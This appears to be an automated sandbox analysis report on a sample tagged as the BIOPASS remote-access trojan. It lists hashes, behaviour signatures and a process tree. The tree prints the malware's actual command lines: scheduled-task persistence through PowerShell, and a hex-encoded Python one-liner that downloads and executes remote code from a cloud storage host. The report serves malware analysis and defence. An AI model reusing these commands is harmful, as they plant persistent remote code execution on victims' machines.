Analysis

  • max time kernel
    126s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-07-2021 07:12

General

  • Target

    30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe

  • Size

    4.8MB

  • MD5

    0c858bb12c5eeb59a7add281fc6045be

  • SHA1

    6517cc3d9ad5a6ffc82fce8097070684fa6a6282

  • SHA256

    30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe

  • SHA512

    096055c770e6f1e1fc1e2993fa565f17cf23b6aa67180662f95aab2adf034cc23baf687c57da74a9a8f85f27883b3f27a6d6edf02a49881b552ad858c3b7f2b6

Malware Config

Signatures

  • biopass

    BIOPASS is a RAT connected with the Winnti group (APT41).

  • family_biopass 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 26 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe
    "C:\Users\Admin\AppData\Local\Temp\30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\system32\ping.exe
      ping www.baidu.com
      2⤵
      • Runs ping.exe
      PID:3568
    • C:\Windows\system32\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_SETTINGS
        3⤵
          PID:3556
    • C:\Windows\system32\cmd.exe
      cmd /c "C:\Users\Public\vc.exe /install /quiet /norestart"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3840
      • C:\Users\Public\vc.exe
        C:\Users\Public\vc.exe /install /quiet /norestart
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2244
        • C:\Windows\Temp\{A2327A5C-8DD6-49EA-BB78-2D9C205CD94D}\.cr\vc.exe
          "C:\Windows\Temp\{A2327A5C-8DD6-49EA-BB78-2D9C205CD94D}\.cr\vc.exe" -burn.clean.room="C:\Users\Public\vc.exe" -burn.filehandle.attached=536 -burn.filehandle.self=544 /install /quiet /norestart
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:740
          • C:\Windows\Temp\{E79D847E-F014-4F20-9EA7-A90AF068A264}\.be\VC_redist.x86.exe
            "C:\Windows\Temp\{E79D847E-F014-4F20-9EA7-A90AF068A264}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{4F9AB522-BA4F-4F40-A682-CE858FFF567D} {88543A56-6F16-42A4-AECA-2108940B7AF9} 740
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Modifies registry class
            PID:3952
    • C:\Windows\system32\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_TEST
        3⤵
        PID:1256
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /DELETE /F /TN SYSTEM_TEST
        3⤵
        PID:3804
    • C:\Windows\system32\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3540
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_CDAEMON
        3⤵
        PID:2456
  • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
    C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929').decode())" a a
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:1400
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3816
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
    1⤵
    • Checks SCSI registry key(s)
    • Modifies data under HKEY_USERS
    PID:1524
  • C:\Windows\system32\srtasks.exe
    C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3916
  • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
    C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929').decode())" a a
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:3836

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/1520-190-0x000001A7B7500000-0x000001A7B7502000-memory.dmp

    Filesize

    8KB

  • memory/1520-191-0x000001A7B7503000-0x000001A7B7505000-memory.dmp

    Filesize

    8KB

  • memory/1520-192-0x000001A7B7506000-0x000001A7B7508000-memory.dmp

    Filesize

    8KB

  • memory/3008-125-0x000001E76E5F0000-0x000001E76E5F2000-memory.dmp

    Filesize

    8KB

  • memory/3008-131-0x000001E76E5F6000-0x000001E76E5F8000-memory.dmp

    Filesize

    8KB

  • memory/3008-126-0x000001E76E5F3000-0x000001E76E5F5000-memory.dmp

    Filesize

    8KB

  • memory/3008-124-0x000001E76E7E0000-0x000001E76E7E1000-memory.dmp

    Filesize

    4KB

  • memory/3008-121-0x000001E76E630000-0x000001E76E631000-memory.dmp

    Filesize

    4KB

  • memory/3540-218-0x00000193AD046000-0x00000193AD048000-memory.dmp

    Filesize

    8KB

  • memory/3540-209-0x00000193AD040000-0x00000193AD042000-memory.dmp

    Filesize

    8KB

  • memory/3540-210-0x00000193AD043000-0x00000193AD045000-memory.dmp

    Filesize

    8KB